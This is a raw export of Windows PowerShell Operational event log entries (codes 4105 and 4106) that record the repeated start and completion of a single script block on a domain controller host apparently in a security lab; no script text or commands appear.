Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475277
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475276
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475275
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475274
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475273
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475272
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475271
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475270
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475269
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475268
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475267
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475266
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475265
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475264
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475263
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475262
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475261
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475260
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475259
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475258
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475257
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475256
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475255
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475254
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475253
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475252
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475251
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475250
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475249
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475248
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475247
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475246
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475245
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475244
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475243
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475242
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475241
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475240
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475239
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475238
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475237
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475236
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475235
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475234
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475233
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475232
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475231
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475230
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475229
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475228
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475227
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475226
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475225
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475224
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
